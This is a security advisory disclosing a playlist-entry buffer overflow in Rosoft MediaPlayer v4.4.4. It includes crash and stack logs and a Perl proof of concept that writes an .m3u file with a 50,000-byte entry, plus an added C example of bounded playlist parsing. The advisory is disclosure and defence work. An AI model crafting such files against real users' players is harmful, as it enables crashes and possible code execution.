Rosoft MediaPlayer v4.4.4 - Buffer Overflow Vulnerability

2011-06-21T00:00:00
ID VULNERLAB:94
Type vulnerlab
Reporter Vulnerability Research Laboratory - X4lt
Modified 2011-06-21T00:00:00

Description

Document Title:
===============
Rosoft MediaPlayer v4.4.4 - Buffer Overflow Vulnerability



Release Date:
=============
2011-06-21


Vulnerability Laboratory ID (VL-ID):
====================================
94


Product & Service Introduction:
===============================
Ever since we released our very first multimedia program in 1999 we have kept on improving the programs to fit our users' needs. 
Over the years we have come up with four programs that do pretty much what you need when it comes to ordinary audio demands. 
We have four programs: Rosoft Audio Converter, Rosoft Audio Recorder, Rosoft CD Extractor and Rosoft Media Player. 
Our programs target non-advanced users, although an advanced user may well find our tools useful. 
Our goal has been to create tools that are easy to use. 
Below is a list of some of the download sites where you can find our programs.  

(Copy of the Vendor Homepage: http://www.rosoftengineering.com/Default.aspx)


Abstract Advisory Information:
==============================
The Vulnerability-Lab team discovered a buffer overflow vulnerability in Rosoft MediaPlayer Free - Silver Edition.


Vulnerability Disclosure Timeline:
==================================
2011-06-21:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================
Rosoft MediaPlayer v4.4.4 (Free - Silver Edition)

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A buffer overflow vulnerability was detected in Rosoft MediaPlayer v4.4.4.
Because the length of the input is not validated while a playlist file is loaded, an overlong entry overflows a buffer and crashes the program.
The bug can very likely be used to gain control of the process, with the privileges of the user account the player runs under.

--- Exception Logs ---
(3f8.310): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001a27d2 ebx=00000041 ecx=0012fff5 edx=0000ad30 esi=7ffb0222 edi=00000010
eip=7c91302c esp=0012e4f8 ebp=0012e504 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlUnicodeToMultiByteN+0x91:
7c91302c 88590b          mov     byte ptr [ecx+0Bh],bl      ds:0023:00130000=41



--- Stacktext Logs ---
WARNING: Stack unwind information not available. Following frames may be wrong.
0012e504 77d202a5 0012e9cc 000186b0 0012e544 ntdll!RtlUnicodeToMultiByteN+0x91
0012e52c 77d46c30 00000000 0019fb80 0000c358 USER32!WCSToMBEx+0x7e
0012e554 77d2f7c0 00160970 00000000 00000001 USER32!GetClipboardFormatNameA+0x68eb
0012e5e0 77d36175 00720298 00000189 00000000 USER32!WINNLSGetIMEHotkey+0x2681
0012e600 77d18709 000502b6 00000189 00000000 USER32!SetDlgItemTextA+0xa0
0012e62c 77d187eb 77d36129 000502b6 00000189 USER32!GetDC+0x72
0012e694 77d1c00e 00000000 77d36129 000502b6 USER32!GetDC+0x154
0012e6c4 77d1e366 77d36129 000502b6 00000189 USER32!DestroyCaret+0x5e
0012e6e4 0043dc93 77d36129 000502b6 00000189 USER32!CallWindowProcA+0x1b
0012e850 0042818b 0012e910 00a00f53 00aad1ec image00400000+0x3dc93
0012e890 0042b5e2 00000189 00000000 0012e9cc image00400000+0x2818b
0012e8a8 77d18709 000502b6 00000189 00000000 image00400000+0x2b5e2
0012e8d4 77d187eb 00a00f53 000502b6 00000189 USER32!GetDC+0x72
0012e93c 77d1b743 00000000 00a00f53 000502b6 USER32!GetDC+0x154
0012e978 77d1e2f7 00720298 00720230 00000000 USER32!GetParent+0x16c
0012e998 00427498 000502b6 00000189 00000000 USER32!SendMessageA+0x49
0012f9d0 41414141 41414141 41414141 41414141 image00400000+0x27498
0012f9d4 41414141 41414141 41414141 41414141 0x41414141
0012f9d8 41414141 41414141 41414141 41414141 0x41414141
0012f9dc 41414141 41414141 41414141 41414141 0x41414141
0012f9e0 41414141 41414141 41414141 41414141 0x41414141
0012f9e4 41414141 41414141 41414141 41414141 0x41414141
0012f9e8 41414141 41414141 41414141 41414141 0x41414141
0012f9ec 41414141 41414141 41414141 41414141 0x41414141
0012f9f0 41414141 41414141 41414141 41414141 0x41414141
0012f9f4 41414141 41414141 41414141 41414141 0x41414141
0012f9f8 41414141 41414141 41414141 41414141 0x41414141
0012f9fc 41414141 41414141 41414141 41414141 0x41414141
0012fa00 41414141 41414141 41414141 41414141 0x41414141
0012fa04 41414141 41414141 41414141 41414141 0x41414141
0012fa08 41414141 41414141 41414141 41414141 0x41414141
0012fa0c 41414141 41414141 41414141 41414141 0x41414141
0012fa10 41414141 41414141 41414141 41414141 0x41414141
0012fa14 41414141 41414141 41414141 41414141 0x41414141
0012fa18 41414141 41414141 41414141 41414141 0x41414141
0012fa1c 41414141 41414141 41414141 41414141 0x41414141
0012fa20 41414141 41414141 41414141 41414141 0x41414141
0012fa24 41414141 41414141 41414141 41414141 0x41414141
0012fa28 41414141 41414141 41414141 41414141 0x41414141
0012fa2c 41414141 41414141 41414141 41414141 0x41414141
...


Pictures:
../1.png


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers via a streamed playlist, or by local attackers to escalate out of the software process.
For demonstration or reproduction ...


#!/usr/bin/perl
# Writes an .m3u playlist whose single entry is "http://" followed by
# 50000 'A' bytes, the input that produces the crash logged above.
use strict;
use warnings;

my $sploitfile = "vlab.m3u";
print " [+] Preparing payload\n";
my $header  = "http://";
my $junk    = "A" x 50000;
my $payload = $header . $junk;
print " [+] Writing payload to file\n";
open(my $fh, '>', $sploitfile) or die "Cannot open $sploitfile: $!";
print $fh $payload;
close($fh);
print " [+] PoC file $sploitfile created\n";
print " [+] Wrote " . length($payload) . " bytes\n";
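The root cause named in the Technical Details section is a missing length check on playlist entries; the PoC above simply produces one entry far longer than any path buffer. The following C program is an added example (not Rosoft's code and not part of the original advisory) of the defensive side of that same parsing step: every non-comment line of an .m3u document is measured and copied into a fixed-size buffer only when it fits, and oversized entries are counted and logged instead of overflowing the stack. The entry limit MAX_ENTRY_LEN, the struct and function names, and the sample playlist (which ends with an entry of the same "http://" + 'A' x 50000 shape the PoC writes) are all constructed for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Maximum length one playlist entry may have. The value is a constructed
 * limit for this example (roughly a Windows MAX_PATH), not Rosoft's. */
#define MAX_ENTRY_LEN 260

struct m3u_stats {
    size_t accepted;   /* entries copied into the bounded buffer */
    size_t rejected;   /* entries dropped for exceeding MAX_ENTRY_LEN */
    size_t longest;    /* longest entry length seen, useful for audit logs */
};

/* Bounded copy of one playlist line into a fixed-size destination.
 * Returns 0 on success, -1 when the line does not fit. The entry is
 * rejected rather than truncated, so a shortened path can never be
 * silently opened as a different file. */
static int copy_entry_bounded(char *dst, size_t dst_size,
                              const char *line, size_t len)
{
    if (len + 1 > dst_size)          /* room for the terminator too */
        return -1;
    memcpy(dst, line, len);
    dst[len] = '\0';
    return 0;
}

/* Parse an in-memory .m3u document. Lines beginning with '#' are
 * comments or extended-M3U directives and are skipped; every other
 * non-empty line is an entry that is length-checked before it is
 * copied into a stack buffer of MAX_ENTRY_LEN + 1 bytes. */
struct m3u_stats parse_m3u(const char *data, size_t size)
{
    struct m3u_stats st = {0, 0, 0};
    char entry[MAX_ENTRY_LEN + 1];
    size_t pos = 0;

    while (pos < size) {
        const char *line = data + pos;
        const char *nl = memchr(line, '\n', size - pos);
        size_t len = nl ? (size_t)(nl - line) : size - pos;
        pos += len + (nl ? 1 : 0);

        if (len > 0 && line[len - 1] == '\r')   /* tolerate CRLF files */
            len--;
        if (len == 0 || line[0] == '#')
            continue;

        if (len > st.longest)
            st.longest = len;

        if (copy_entry_bounded(entry, sizeof entry, line, len) == 0) {
            st.accepted++;
        } else {
            /* Oversized entry: report and drop instead of overflowing. */
            fprintf(stderr, "rejected entry of %zu bytes (limit %d)\n",
                    len, MAX_ENTRY_LEN);
            st.rejected++;
        }
    }
    return st;
}

/* Constructed sample: two ordinary entries followed by one entry of the
 * PoC's shape, "http://" and then `pad` bytes of 'A'. */
static char *build_sample(size_t pad, size_t *out_len)
{
    const char *head = "#EXTM3U\r\nC:\\music\\one.mp3\r\n"
                       "http://example.invalid/two.mp3\r\nhttp://";
    size_t hl = strlen(head);
    char *buf = malloc(hl + pad + 2);
    if (!buf)
        return NULL;
    memcpy(buf, head, hl);
    memset(buf + hl, 'A', pad);
    buf[hl + pad] = '\n';
    buf[hl + pad + 1] = '\0';
    *out_len = hl + pad + 1;
    return buf;
}

int main(void)
{
    size_t len;
    char *sample = build_sample(50000, &len);
    if (!sample)
        return 1;
    struct m3u_stats st = parse_m3u(sample, len);
    printf("accepted=%zu rejected=%zu longest=%zu\n",
           st.accepted, st.rejected, st.longest);
    free(sample);
    return 0;
}
```

Run against the 50000-byte sample, the parser accepts the two normal entries, rejects the oversized one and reports its length (50007 bytes), which is exactly the kind of event worth logging when a player or playlist importer is handed untrusted files.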


Security Risk:
==============
The security risk of the buffer overflow vulnerability via m3u files is estimated as high.


Credits & Authors:
==================
Vulnerability Research Laboratory - X4lt


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory